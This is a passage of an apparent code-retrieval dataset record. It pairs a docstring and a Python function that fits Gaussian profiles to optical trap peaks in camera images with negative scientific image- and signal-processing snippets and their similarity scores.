np.append(LL_array,ll_val)\n A_array_short = np.append(A_array_short,A_array[i])\n spect_array = self.spectrum*np.array(A_array_short)\n\n # Save output\n np.save(work_dir+'ScanOutput/'+self.tag+'/En_array-'+str(self.flux_array_ebin)+'.npy',self.En_center)\n np.save(work_dir+'ScanOutput/'+self.tag+'/LL_array-'+str(self.flux_array_ebin)+'.npy',LL_array)\n np.save(work_dir+'ScanOutput/'+self.tag+'/Flux_array-'+str(self.flux_array_ebin)+'.npy',spect_array)", "def extract_features(img, thr=0.005):\n if img.ndims == 3:\n img = cv2.cvtColor(im1, cv2.COLOR_BGR2GRAY)\n\n detector = cv2.AKAZE_create()\n (kpts, descs) = detector.detectAndCompute(img, None)\n return kpts, descs", "def _compute_supersky(self, starMasks):\n # TODO: break this into more managably bite sized bits if necessary.\n\n # Construct a median normalized data stack\n dataStack = np.zeros(self.shape, dtype=np.float32)\n\n # Loop through each image, normalize and place in data stack\n for imgNum, img in enumerate(self.imageList):\n # Copy the data for this image\n thisData = img.data\n\n # Mask this image with its starMask\n starInds = np.where(starMasks[imgNum, :, :])\n thisData[starInds] = np.NaN\n\n # Compute the median of this image\n thisMedian = np.nanmedian(thisData)\n\n # Median normalize this image\n thisData /= thisMedian\n\n # Place the normalized image in its place\n dataStack[imgNum, :, :] = thisData\n\n # Compute the median image (ignore warnings because we'll fix those)\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n medianArray = np.nanmedian(dataStack, axis=0)\n\n # Comptue uncertainty as standard deviation/sqrt(numOfUnmaskedPixels)\n stdArray = np.nanstd(dataStack, axis=0)\n numPix = np.nansum(dataStack, axis=0)\n uncertArray = stdArray/np.sqrt(numPix - 1)\n\n # Renormalize by this output median\n thisMedian = np.nanmedian(medianArray)\n medianArray /= thisMedian\n uncertArray /= np.abs(thisMedian)\n\n # Return to user\n return medianArray, uncertArray", "def find_gaussian(img,sigma=25):\n method = 'cv2.TM_CCOEFF_NORMED'\n size=3*sigma\n template = gaussian(size,sigma)\n template/=template.max()\n template*=255\n template = template.astype(np.uint8)\n \n threshold = 0.9\n w, h = template.shape[::-1]\n \n img2 = img.copy()\n meth = eval(method)\n\n # Apply template Matching\n res = cv2.matchTemplate(img2,template,meth)\n #Filters location map so that only one gaussian is found per contiguous location\n location_map = res >= threshold*np.max(res)\n location_map,nr = ndi.label(location_map)\n list_x = []\n list_y = []\n for label in range(1,nr+1):\n tmp=location_map==label\n if np.count_nonzero(tmp)>1:\n points = np.where(tmp)\n l = len(points[0])\n cx = (np.sum(points[0]) + l/2)/l\n cy = (np.sum(points[1]) + l/2 )/l\n list_x.append(cx)\n list_y.append(cy)\n loc= (np.asarray(list_x),np.asarray(list_y))\n stack_to_remove = np.zeros((size,size,len(loc[0])))\n i=0\n for pt in zip(*loc[::-1]):\n cv2.rectangle(img2, pt, (pt[0] + w, pt[1] + h), 255, 2)\n stack_to_remove[:,:,i] = img[pt[1]:pt[1]+w,pt[0]:pt[0]+h]\n i+=1\n return stack_to_remove,loc", "def ts_method(signal, peaks, template_duration: float = 0.12, fs: int = processing.FS, window: int = 10, **kwargs):\n\n t_dur = round(template_duration * fs)\n if not t_dur % 2 == 0:\n t_dur += 1\n dims = signal.shape\n # if np.max(np.abs(signal[0, :])) < np.max(np.abs(signal[1, :])):\n # r_peaks = find_qrs(signal[1, :], peak_search=peak_search)\n # r_peaks = peak_enhance(signal[1, :], peaks=r_peaks, window=0.2)\n # else:\n # processing.scatter_beautiful(r_peaks * 1000 / fs, title='peaks')\n extracted_signal = np.copy(signal)\n # print(len(r_peaks))\n # Please, rework it...\n for n in range(dims[0]):\n for i in range(0, len(peaks), window):\n\n if i + window > len(peaks):\n r_peaks = peaks[i:]\n else:\n r_peaks = peaks[i:i + window]\n\n template = np.full((len(r_peaks), t_dur), np.nan)\n for num, r_ind in enumerate(r_peaks):\n if r_ind < t_dur // 2:\n template[num, t_dur // 2 - r_ind - 1:] = extracted_signal[n, 0:r_ind + t_dur // 2 + 1]\n elif r_ind + t_dur // 2 + 1 > dims[1]:\n template[num, 0:dims[1] - r_ind + t_dur // 2] = extracted_signal[n, r_ind - t_dur // 2:]\n else:\n template[num] = extracted_signal[n, r_ind - t_dur // 2:r_ind + t_dur // 2]\n template_mean = np.nanmean(template, axis=0) # None for edge cases\n for r_ind in r_peaks:\n if r_ind < t_dur // 2:\n extracted_signal[n, 0:r_ind + t_dur // 2 + 1] -= template_mean[t_dur // 2 - r_ind - 1:]\n # processing.scatter_beautiful(components[n, :], title=' subtracted channel start ' + str(n))\n elif r_ind + t_dur // 2 + 1 > dims[1]:\n extracted_signal[n, r_ind - t_dur // 2:r_ind + t_dur // 2 + 1] -= template_mean[\n 0:dims[1] - r_ind + t_dur // 2]\n # processing.scatter_beautiful(components[n, :], title=' subtracted channel end ' + str(n))\n else:\n extracted_signal[n, r_ind - t_dur // 2:r_ind + t_dur // 2] -= template_mean\n # processing.scatter_beautiful(components[n, :], title=' subtracted channel ' + str(n))\n return extracted_signal", "def gaussianPyr(img: np.ndarray, levels: int = 4) -> List[np.ndarray]:\r\n gauss_pyramid = [img]\r\n gArr = cv2.getGaussianKernel(5, -1)\r\n gKernel = gArr @ gArr.transpose()\r\n for i in range(1, levels):\r\n It = cv2.filter2D(gauss_pyramid[i-1], -1, gKernel)\r\n It = It[::2, ::2]\r\n gauss_pyramid.append(It)\r\n\r\n return gauss_pyramid", "def extract_statistics(transformed: np.ndarray) -> np.ndarray:\n ecg_features = []\n print(\"Extracting statistics from transformed signals...\")\n\n for x in tqdm(transformed):\n median_temp = np.median(x[:, :-1], axis=0)\n mad_temp = median_abs_deviation(x[:, :-1], axis=0)\n\n median_hr = np.median(x[:, -1], keepdims=True)\n mad_hr = median_abs_deviation(x[:, -1]).reshape([-1])\n\n features = np.concatenate([median_temp, mad_temp, median_hr, mad_hr])\n ecg_features.append(features)\n\n return np.array(ecg_features)", "def extract_anisotropy_features (Parameters, image, mask=None):\n \n data_inputs = {}\n \n Ka, Kb, Kc = Parameters.kA, Parameters.kB, Parameters.kC\n \n \n h, w, channels = image.shape\n \n if channels == 2:\n channel_types = [\"Para\", \"Perp\"]\n elif channels == 3:\n channel_types = [\"Open\", \"Para\", \"Perp\"]\n \n \n for index, channel in enumerate(channel_types):\n \n data_inputs[channel] = np.sum(image[:,:, index])/np.count_nonzero(image[:,:, index])\n\n\n #Additional parameters\n para_value = data_inputs['Para']\n perp_value = data_inputs['Perp']\n data_inputs['AniAvg'] = (para_value - perp_value)/(para_value + 2*perp_value)\n \n #With corrections\n data_inputs['Ix'] = Ix = ((Ka+Kb)*perp_value - (Ka+Kc)*para_value)/(Ka*Kb + Kb*Kb - Ka*Kc - Kc*Kc)\n data_inputs['Iy'] = Iy = (Kb*para_value - Kc*perp_value)/(Ka*Kb + Kb*Kb - Ka*Kc - Kc*Kc)\n data_inputs['AniAvg'] = (Ix - Iy)/(Ix + 2*Iy)\n \n\n \n return (data_inputs)", "def build_zigzag_times(rips,n,numbins):\n times = [[] for x in range(0,rips.__len__())]\n i=0\n for x in rips:\n dim = x.dimension()\n t = [];\n for k in range(0,dim+1):\n t.append(x[k])\n xmin = math.floor(min(t)/n)\n xmax = math.floor(max(t)/n)\n if xmax == 0:\n bd = [0,1]\n elif xmin == numbins-1:\n bd = [2*xmin-1,2*xmin]\n elif xmax == xmin:\n bd = [2*xmin-1,2*xmin+1]\n elif xmax > xmin:\n bd = [2*xmax-1,2*xmax-1]\n else:\n print(\"Something has gone horribly wrong!\")\n times[i] = bd\n i = i+1\n return times", "def search_peaks(self, image):\n table = Table()\n if not isinstance(image, np.ndarray):\n return table\n\n search_image = image\n if self.smooth:\n with catch_warnings():\n simplefilter('ignore')\n search_image = convolve_fft(\n search_image, Gaussian2DKernel(self.sigma),\n normalize_kernel=True,\n preserve_nan=True)\n\n # always replace NaNs with median level: DAOStarFinder\n # won't find sources with NaN on top\n nval = np.isnan(search_image)\n search_image[nval] = np.median(search_image[~nval])\n\n # always take absolute value for fitting purposes\n search_image = abs(search_image)\n\n threshold = np.array([np.nanmin(search_image),\n np.nanmax(search_image)])\n threshold *= [0.9, 1.1]\n if threshold[0] < 0: # pragma: no cover\n threshold[0] = 0.\n\n self.iteration = 0\n while self.iteration < self.maxiter:\n self.iteration += 1\n with catch_warnings():\n simplefilter('ignore', AstropyWarning)\n self.threshold = threshold.mean()\n finder = DAOStarFinder(\n self.threshold, self.fwhm,\n sharplo=self.sharplo, sharphi=self.sharphi,\n roundlo=self.roundlo, roundhi=self.roundhi)\n table = finder.find_stars(search_image)\n self.chopnod_sort(table)\n\n if self.refine and self.positive:\n self.refine_table(image, table)\n if not table:\n nfound = 0\n else:\n nfound = len(table)\n\n if abs(threshold[0] - threshold[1]) < self.eps and (\n nfound != self.npeaks):\n self.print('Min/max interval is null, breaking loop at '\n 'iteration #%s' % self.iteration)\n return table\n elif nfound < self.npeaks:\n threshold[1] = self.threshold\n elif nfound > self.npeaks:\n threshold[0] = self.threshold\n else:\n return table\n else:\n return table", "def create_gaussian_array(self):\n\n # Fill array of size l x w with Gaussian Noise.\n terrain_length = int(ceil(self.length/self.resolution))\n terrain_width = int(ceil(self.width/self.resolution))\n gaussian_array = np.random.normal(self.mu, self.sigma, (terrain_length,terrain_width))\n\n # Filter the array to smoothen the variation of the noise\n gaussian_array = gaussian_filter(gaussian_array, self.sigma_filter)\n\n return gaussian_array", "def _screen_by_snr(self,\n array: np.ndarray,\n is_smoothed: bool,\n keep_negative: bool) -> np.ndarray:\n n_gates, _, saturation_noise, noise_min = self.noise_params\n noise_min = noise_min[0] if is_smoothed is True else noise_min[1]\n noise = _estimate_noise_from_top_gates(array, n_gates, noise_min)\n array = self._reset_low_values_above_saturation(array, saturation_noise)\n array = self._remove_noise(array, noise, keep_negative)\n return array" ]
[ "0.5896619", "0.5877746", "0.52297366", "0.5136815", "0.50773364", "0.504893", "0.50198776", "0.4991051", "0.49902415", "0.4987427", "0.4953718", "0.4843196", "0.48095766", "0.48035288", "0.479248", "0.47632834", "0.4758519", "0.47351038", "0.47328326", "0.4723849", "0.4702265", "0.46986237", "0.46973252", "0.46955433", "0.46665666", "0.46371087", "0.4629789", "0.4593697", "0.4585569", "0.457788", "0.4570373", "0.45597613", "0.4548427", "0.45269942", "0.4519822", "0.45122102", "0.4506112", "0.44978294", "0.4485861", "0.44839486", "0.44684196", "0.4454845", "0.44409993", "0.44336858", "0.44205695", "0.44197884", "0.4414834", "0.4409965", "0.44067237", "0.44012603", "0.4391486", "0.4387931", "0.43780383", "0.436045", "0.43513215", "0.4349876", "0.4345894", "0.43379366", "0.43303996", "0.43216345", "0.43212214", "0.4319174", "0.43162397", "0.43150362", "0.431432", "0.43135822", "0.43032873", "0.4300566", "0.42999196", "0.42990294", "0.42926008", "0.4290893", "0.42843837", "0.42818123", "0.4278887", "0.42783886", "0.42760482", "0.42705485", "0.42650598", "0.42611873", "0.4259252", "0.4256837", "0.4253098", "0.4246229", "0.42459166", "0.42455697", "0.42443842", "0.4239663", "0.4238853", "0.42382583", "0.423618", "0.42331132", "0.42329153", "0.42311934", "0.4230878", "0.42305103", "0.4229905", "0.42279017", "0.42122227", "0.42117012" ]
0.52466863
2
Scans the given image for the 'ntraps' number of trap intensity peaks. Then extracts the 1dimensional gaussian profiles across the traps and returns a list of the amplitudes.
def analyze_image(which_cam, image, ntraps, iteration=0, verbose=False): threshes = [0.5, 0.6] margin = 10 threshold = np.max(image) * threshes[which_cam] im = image.transpose() x_len = len(im) peak_locs = np.zeros(x_len) peak_vals = np.zeros(x_len) ## Trap Peak Detection ## for i in range(x_len): if i < margin or x_len - i < margin: peak_locs[i] = 0 peak_vals[i] = 0 else: peak_locs[i] = np.argmax(im[i]) peak_vals[i] = max(im[i]) ## Trap Range Detection ## first = True pos_first, pos_last = 0, 0 left_pos = 0 for i, p in enumerate(peak_vals): if p > threshold: left_pos = i elif left_pos != 0: if first: pos_first = (left_pos + i) // 2 first = False pos_last = (left_pos + i) // 2 left_pos = 0 ## Separation Value ## separation = (pos_last - pos_first) / ntraps # In Pixels ## Initial Guesses ## means0 = np.linspace(pos_first, pos_last, ntraps).tolist() waists0 = (separation * np.ones(ntraps) / 2).tolist() ampls0 = (max(peak_vals) * 0.7 * np.ones(ntraps)).tolist() _params0 = [means0, waists0, ampls0, [0.06]] params0 = [item for sublist in _params0 for item in sublist] ## Fitting ## if verbose: print("Fitting...") xdata = np.arange(x_len) popt, pcov = curve_fit(lambda x, *params_0: wrapper_fit_func(x, ntraps, params_0), xdata, peak_vals, p0=params0) if verbose: print("Fit!") plt.figure() plt.plot(xdata, peak_vals) # Data if iteration: plt.plot(xdata, wrapper_fit_func(xdata, ntraps, params0), '--r') # Initial Guess plt.plot(xdata, wrapper_fit_func(xdata, ntraps, popt)) # Fit plt.title("Iteration: %d" % iteration) else: plt.title("Final Product") plt.xlim((pos_first - margin, pos_last + margin)) plt.legend(["Data", "Guess", "Fit"]) plt.show(block=False) print("Fig_Newton") trap_powers = np.frombuffer(popt[2 * ntraps:3 * ntraps]) return trap_powers
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def trapfilt_taps(N, phil, alfa):\n\n\n\n tt = arange(-N/2,N/2 + 1) # Time axis for h(t) \n # ***** Generate impulse response ht here *****\n ht = zeros(len(tt))\n ix = where(tt != 0)[0]\n if alfa != 0:\n ht[ix] = ((sin(2*pi*phil*tt[ix]))/(pi*tt[ix]))*((sin(2*pi*alfa*phil*tt[ix]))/(2*pi*alfa*phil*tt[ix]))\n else:\n ht[ix] = (sin(2*pi*phil*tt[ix]))/(pi*tt[ix])\n ix0 = where(tt == 0)[0]\n ht[ix0] = 2*phil\n ht = ht/sum(power(ht,2))\n\n return ht", "def guess_image(which_cam, image, ntraps):\n threshes = [0.5, 0.65]\n ## Image Conditioning ##\n margin = 10\n threshold = np.max(image)*threshes[which_cam]\n im = image.transpose()\n\n x_len = len(im)\n peak_locs = np.zeros(x_len)\n peak_vals = np.zeros(x_len)\n\n ## Trap Peak Detection ##\n for i in range(x_len):\n if i < margin or x_len - i < margin:\n peak_locs[i] = 0\n peak_vals[i] = 0\n else:\n peak_locs[i] = np.argmax(im[i])\n peak_vals[i] = max(im[i])\n\n ## Trap Range Detection ##\n first = True\n pos_first, pos_last = 0, 0\n left_pos = 0\n for i, p in enumerate(peak_vals):\n if p > threshold:\n left_pos = i\n elif p < threshold and left_pos != 0:\n if first:\n pos_first = (left_pos + i) // 2\n first = False\n pos_last = (left_pos + i) // 2\n left_pos = 0\n\n ## Separation Value ##\n separation = (pos_last - pos_first) / ntraps # In Pixels\n\n ## Initial Guesses ##\n means0 = np.linspace(pos_first, pos_last, ntraps).tolist()\n waists0 = (separation * np.ones(ntraps) / 2).tolist()\n ampls0 = (max(peak_vals) * 0.7 * np.ones(ntraps)).tolist()\n _params0 = [means0, waists0, ampls0, [0.06]]\n params0 = [item for sublist in _params0 for item in sublist]\n\n xdata = np.arange(x_len)\n plt.figure()\n plt.plot(xdata, peak_vals)\n plt.plot(xdata, wrapper_fit_func(xdata, ntraps, params0), '--r') # Initial Guess\n plt.xlim((pos_first - margin, pos_last + margin))\n plt.legend([\"Data\", \"Guess\", \"Fit\"])\n plt.show(block=False)", "def gaussianFilter(gain,BT,spSym,nTaps):\n\n a = np.sqrt(np.log(2)/2)/BT\n t = np.linspace(-.5*nTaps,.5*nTaps-1,nTaps)/spSym\n\n ft = np.sqrt(np.pi)/a *np.exp(-(np.pi**2*(t)**2)/a**2)\n ft /= np.sum(ft) * gain # normalize filter\n\n return ft", "def gaussian_proba_map(img):\n method = 'cv2.TM_CCOEFF_NORMED'\n sigmas = [41,31,21,11]\n out = np.zeros(img.shape)\n for sigma in sigmas:\n size=3*sigma\n template = gaussian(size,sigma)\n template/=template.max()\n template*=255\n template = template.astype(np.uint8)\n \n img2 = img.copy()\n meth = eval(method)\n # Apply template Matching\n res = cv2.matchTemplate(img2,template,meth)\n res = np.pad(res,size/2,mode='constant')\n to_replace = res>out\n out[to_replace] = res[to_replace]\n return out", "def compute_tap_features(xtaps, ytaps, t, threshold=20):\n import numpy as np\n\n from mhealthx.extractors.tapping import compute_drift, \\\n compute_tap_intervals, compute_intertap_gap\n from mhealthx.extractors.tapping import TapFeatures as T\n from mhealthx.signals import signal_features\n\n if isinstance(xtaps, list):\n xtaps = np.array(xtaps)\n if isinstance(ytaps, list):\n ytaps = np.array(ytaps)\n if isinstance(t, list):\n t = np.array(t)\n\n # Intertap intervals:\n ipress, intervals = compute_tap_intervals(xtaps, t, threshold)\n\n # Filter data:\n t = t[ipress]\n xtaps = xtaps[ipress]\n ytaps = ytaps[ipress]\n\n # Delta between fastest and slowest intertap intervals:\n T.intertap_gap10, T.intertap_gap25, \\\n T.intertap_gap50 = compute_intertap_gap(intervals)\n\n # Left and right taps and drift:\n mean_x = np.mean(xtaps)\n iL = np.where(xtaps < mean_x)\n iR = np.where(xtaps >= mean_x)\n xL = xtaps[iL]\n yL = ytaps[iL]\n xR = xtaps[iR]\n yR = ytaps[iR]\n driftL = compute_drift(xL, yL)\n driftR = compute_drift(xR, yR)\n\n # Number of taps:\n T.num_taps = xtaps.size\n T.num_taps_left = xL.size\n T.num_taps_right = xR.size\n\n # Time:\n T.time_rng = t[-1] - t[0]\n\n # Intertap interval statistics:\n T.intertap_num, T.intertap_min, T.intertap_max, T.intertap_rng, \\\n T.intertap_avg, T.intertap_std, T.intertap_med, T.intertap_mad, \\\n T.intertap_kurt, T.intertap_skew, T.intertap_cvar, T.intertap_lower25, \\\n T.intertap_upper25, T.intertap_inter50, T.intertap_rms, \\\n T.intertap_entropy, T.intertap_tk_energy = signal_features(intervals)\n\n # Tap statistics:\n T.xL_num, T.xL_min, T.xL_max, T.xL_rng, T.xL_avg, T.xL_std, \\\n T.xL_med, T.xL_mad, T.xL_kurt, T.xL_skew, T.xL_cvar, \\\n T.xL_lower25, T.xL_upper25, T.xL_inter50, T.xL_rms, \\\n T.xL_entropy, T.xL_tk_energy = signal_features(xL)\n\n T.xR_num, T.xR_min, T.xR_max, T.xR_rng, T.xR_avg, T.xR_std, \\\n T.xR_med, T.xR_mad, T.xR_kurt, T.xR_skew, T.xR_cvar, \\\n T.xR_lower25, T.xR_upper25, T.xR_inter50, T.xR_rms, \\\n T.xR_entropy, T.xR_tk_energy = signal_features(xR)\n\n # T.yL_num, T.yL_min, T.yL_max, T.yL_rng, T.yL_avg, T.yL_std, \\\n # T.yL_med, T.yL_mad, T.yL_kurt, T.yL_skew, T.yL_cvar, \\\n # T.yL_lower25, T.yL_upper25, T.yL_inter50, T.yL_rms, \\\n # T.yL_entropy, T.yL_tk_energy = signal_features(yL)\n\n # T.yR_num, T.yR_min, T.yR_max, T.yR_rng, T.yR_avg, T.yR_std, \\\n # T.yR_med, T.yR_mad, T.yR_kurt, T.yR_skew, T.yR_cvar, \\\n # T.yR_lower25, T.yR_upper25, T.yR_inter50, T.yR_rms, \\\n # T.yR_entropy, T.yR_tk_energy = signal_features(yR)\n\n # Drift statistics:\n T.driftL_num, T.driftL_min, T.driftL_max, T.driftL_rng, T.driftL_avg, \\\n T.driftL_std, T.driftL_med, T.driftL_mad, T.driftL_kurt, T.driftL_skew, \\\n T.driftL_cvar, T.driftL_lower25, T.driftL_upper25, T.driftL_inter50, \\\n T.driftL_rms, T.driftL_entropy, T.driftL_tk_energy = \\\n signal_features(driftL)\n\n T.driftR_num, T.driftR_min, T.driftR_max, T.driftR_rng, T.driftR_avg, \\\n T.driftR_std, T.driftR_med, T.driftR_mad, T.driftR_kurt, T.driftR_skew, \\\n T.driftR_cvar, T.driftR_lower25, T.driftR_upper25, T.driftR_inter50, \\\n T.driftR_rms, T.driftR_entropy, T.driftR_tk_energy = \\\n signal_features(driftR)\n\n return T", "def extract_features(img, sigmas, n_features): \n dims = img.shape # dimensions of the image\n \n features = np.zeros((dims[0], dims[1], n_features)) # each feature map has the same size as the input image\n \n # the first feature we use is the pixel intensity in the green channel itself\n img_g = img[:,:,1] #I just assume it follows the RGB convention and not GBR or BGR...\n features[:,:,0] = img_g\n features[:,:,1] = np.sum(img,axis=2) \n \n gabors = get_gabors() \n \n # >>> YOUR CODE STARTS HERE <<<\n i = 2\n# for s in sigmas:\n# gfilters = gauss_filter(s)\n# for gf in gfilters:\n# features[:,:,i] = scipy.signal.fftconvolve(img_g, gf, mode='same') ;i+=1\n for s in sigmas:\n gauss = gauss_filter(s)\n for g in gauss:\n features[:,:,i] = scipy.signal.fftconvolve(img_g, g, mode='same') ;i+=1\n \n for gabor in gabors:\n features[:,:,i] = scipy.signal.fftconvolve(img_g, gabor, mode='same') ;i+=1\n \n \n features[:,:,i] = sobel(img_g, axis=0) ;i+=1\n features[:,:,i] = sobel(img_g, axis=1) ;i+=1\n features[:,:,i] = sobel(img_g, axis=0)+sobel(img_g, axis=1) ;i+=1\n features[:,:,i] = feature.canny(img_g, sigma=0.0) ;i+=1\n features[:,:,i] = feature.canny(img_g, sigma=0, low_threshold=13, high_threshold=50);i+=1\n features[:,:,i] = feature.canny(img_g, sigma=1)\n # >>> YOUR CODE ENDS HERE <<< \n \n return features", "def read_amplification(amp_file = 'dist.dat'):\n n_img, amp_img = np.loadtxt(amp_file, usecols=(0, 6), unpack=True)\n\n amp = []\n\n amp_tmp = []\n\n count = 1\n\n for i in range(len(n_img)):\n if count == n_img[i]:\n amp_tmp.append( amp_img[i] )\n else:\n amp.append(amp_tmp)\n\n amp_tmp = []\n\n amp_tmp.append( amp_img[i] )\n\n count = count + 1\n amp.append(amp_tmp)\n\n return amp", "def cs4243_gauss_pyramid(image, n=3):\n kernel = cs4243_gaussian_kernel(7, 1)\n pyramid = []\n ## your code here####\n\n pyramid = [image]\n for i in range(n):\n gpyr_image = cs4243_filter_faster(pyramid[i], kernel)\n gpyr_image = cs4243_downsample(gpyr_image, 2)\n pyramid.append(gpyr_image)\n \n ##\n return pyramid", "def gaussianarray1d(x, x0_vec, wx_vec, A_vec, offset, ntraps):\n array = np.zeros(np.shape(x))\n for k in range(ntraps):\n array = array + gaussian1d(x, x0_vec[k], wx_vec[k], A_vec[k], 0)\n return array + offset", "def get_gaussian_ff_top(self, filenames):\n amber_ffs = []\n for fname in filenames:\n amber_ffs.append(self._get_gaussian_ff_top_single(filename=fname))\n return amber_ffs", "def get_fluxes_within_mask(tpf, aper_mask, gaia_sources):\n assert tpf is not None\n assert aper_mask is not None\n assert gaia_sources is not None\n ra, dec = gaia_sources[[\"ra\", \"dec\"]].values.T\n pix_coords = tpf.wcs.all_world2pix(np.c_[ra, dec], 0)\n contour_points = measure.find_contours(aper_mask, level=0.1)[0]\n isinside = [\n is_point_inside_mask(contour_points, pix) for pix in pix_coords\n ]\n min_gmag = gaia_sources.loc[isinside, \"phot_g_mean_mag\"].min()\n gamma = gaia_sources.loc[isinside, \"phot_g_mean_mag\"].apply(\n lambda x: 10 ** (0.4 * (min_gmag - x))\n )\n return gamma", "def compute_tap_intervals(xtaps, t, threshold=20):\n import numpy as np\n\n if isinstance(xtaps, list):\n xtaps = np.asarray(xtaps)\n if isinstance(t, list):\n t = np.asarray(t)\n\n # Set time points:\n tap_times = t - t[0]\n\n # Calculate x offset:\n xtaps_offset = xtaps - np.mean(xtaps)\n\n # Find left/right finger \"press\" events:\n dx = xtaps_offset[1:] - xtaps_offset[:-1]\n ipress = np.where(np.abs(dx) > threshold)\n\n # Filter data:\n #xtaps = xtaps[ipress]\n tap_times = tap_times[ipress]\n\n # Find press event intervals:\n tap_intervals = tap_times[1:] - tap_times[:-1]\n\n return ipress, tap_intervals", "def smooth_spectra(xarr, farr, sigma=3, nkern=20):\n xkern = np.arange(nkern)\n kern = np.exp(-(xkern - 0.5 * nkern) ** 2 / (sigma) ** 2)\n\n return gaussian_filter1d(farr, sigma)", "def _get_features_from_batch_images(self, img, r, p):\n tmp_feats = []\n for channel in range(4):\n current_img = img[channel, :, :]\n tmp_feats = np.append(tmp_feats, np.histogram(current_img)[0])\n # extract 8*8 patches of 64*64 px and derive 10 bins histogram\n for j in range(r):\n for k in range(r):\n tmp_feats = np.append(\n tmp_feats,\n np.histogram(current_img[j * p:(j + 1) * (p), k *\n p:(k + 1) * p])[0])\n return tmp_feats", "def features_sigma(img,\n sigma,\n intensity=True,\n edges=True,\n texture=True):\n\n features = []\n\n gx,gy = np.meshgrid(np.arange(img.shape[1]), np.arange(img.shape[0]))\n # print(gx.shape)\n #features.append(gx)\n gx = filters.gaussian(gx, sigma)\n gy = filters.gaussian(gy, sigma)\n\n features.append(np.sqrt(gx**2 + gy**2)) #use polar radius of pixel locations as cartesian coordinates\n\n del gx, gy\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Location features extracted using sigma= %f' % (sigma))\n\n img_blur = filters.gaussian(img, sigma)\n\n if intensity:\n features.append(img_blur)\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Intensity features extracted using sigma= %f' % (sigma))\n\n if edges:\n features.append(filters.sobel(img_blur))\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Edge features extracted using sigma= %f' % (sigma))\n\n if texture:\n H_elems = [\n np.gradient(np.gradient(img_blur)[ax0], axis=ax1)\n for ax0, ax1 in itertools.combinations_with_replacement(range(img.ndim), 2)\n ]\n\n eigvals = feature.hessian_matrix_eigvals(H_elems)\n del H_elems\n\n for eigval_mat in eigvals:\n features.append(eigval_mat)\n del eigval_mat\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Texture features extracted using sigma= %f' % (sigma))\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Image features extracted using sigma= %f' % (sigma))\n\n return features", "def repIpdTft(length,gammas,epsilon):\r\n avgRewards = []\r\n for gamma in gammas: \r\n avgRewards.append(np.mean(ipdTft(length,gamma,epsilon)))\r\n return(avgRewards)", "def sample(self, n_samps):\n # print('gauss trying to sample '+str(n_samps)+' from '+str(self.dist))\n # xs = np.array([self.sample_one() for n in range(n_samps)])\n xs = np.array(self.dist.sample(n_samps))\n # print('gauss sampled '+str(n_samps)+' from '+str(self.dist))\n return xs", "def extract_features(\n img,\n n_sigmas,\n multichannel=True,\n intensity=True,\n edges=True,\n texture=True,\n sigma_min=0.5,\n sigma_max=16,\n):\n if multichannel: #img.ndim == 3 and multichannel:\n all_results = (\n extract_features_2d(\n dim,\n img[..., dim],\n n_sigmas,\n intensity=intensity,\n edges=edges,\n texture=texture,\n sigma_min=sigma_min,\n sigma_max=sigma_max,\n )\n for dim in range(img.shape[-1])\n )\n features = list(itertools.chain.from_iterable(all_results))\n else:\n features = extract_features_2d(0,\n img,\n n_sigmas,\n intensity=intensity,\n edges=edges,\n texture=texture,\n sigma_min=sigma_min,\n sigma_max=sigma_max,\n )\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Feature extraction complete')\n\n logging.info('percent RAM usage: %f' % (psutil.virtual_memory()[2]))\n logging.info('Memory mapping features to temporary file')\n\n features = memmap_feats(features)\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('percent RAM usage: %f' % (psutil.virtual_memory()[2]))\n\n return features #np.array(features)", "def t1_hypointensity( x, xsegmentation, xWMProbability, template, templateWMPrior, wmh_thresh=0.1 ):\n mybig = [88,128,128]\n templatesmall = ants.resample_image( template, mybig, use_voxels=True )\n qaff = ants.registration(\n ants.rank_intensity(x),\n ants.rank_intensity(templatesmall), 'SyN',\n syn_sampling=2,\n syn_metric='CC',\n reg_iterations = [25,15,0,0],\n aff_metric='GC', random_seed=1 )\n afftx = qaff['fwdtransforms'][1]\n templateWMPrior2x = ants.apply_transforms( x, templateWMPrior, qaff['fwdtransforms'] )\n cerebrum = ants.threshold_image( xsegmentation, 2, 4 )\n realWM = ants.threshold_image( templateWMPrior2x , 0.1, math.inf )\n inimg = ants.rank_intensity( x )\n parcellateWMdnz = ants.kmeans_segmentation( inimg, 2, realWM, mrf=0.3 )['probabilityimages'][0]\n x2template = ants.apply_transforms( templatesmall, x, afftx, whichtoinvert=[True] )\n parcellateWMdnz2template = ants.apply_transforms( templatesmall,\n cerebrum * parcellateWMdnz, afftx, whichtoinvert=[True] )\n # features = rank+dnz-image, lprob, wprob, wprior at mybig resolution\n f1 = x2template.numpy()\n f2 = parcellateWMdnz2template.numpy()\n f3 = ants.apply_transforms( templatesmall, xWMProbability, afftx, whichtoinvert=[True] ).numpy()\n f4 = ants.apply_transforms( templatesmall, templateWMPrior, qaff['fwdtransforms'][0] ).numpy()\n myfeatures = np.stack( (f1,f2,f3,f4), axis=3 )\n newshape = np.concatenate( [ [1],np.asarray( myfeatures.shape )] )\n myfeatures = myfeatures.reshape( newshape )\n\n inshape = [None,None,None,4]\n wmhunet = antspynet.create_unet_model_3d( inshape,\n number_of_outputs = 1,\n number_of_layers = 4,\n mode = 'sigmoid' )\n\n wmhunet.load_weights( get_data(\"simwmhseg\", target_extension='.h5') )\n\n pp = wmhunet.predict( myfeatures )\n\n limg = ants.from_numpy( tf.squeeze( pp[0] ).numpy( ) )\n limg = ants.copy_image_info( templatesmall, limg )\n lesresam = ants.apply_transforms( x, limg, afftx, whichtoinvert=[False] )\n # lesresam = lesresam * cerebrum\n rnmdl = antspynet.create_resnet_model_3d( inshape,\n number_of_classification_labels = 1,\n layers = (1,2,3),\n residual_block_schedule = (3,4,6,3), squeeze_and_excite = True,\n lowest_resolution = 32, cardinality = 1, mode = \"regression\" )\n rnmdl.load_weights( 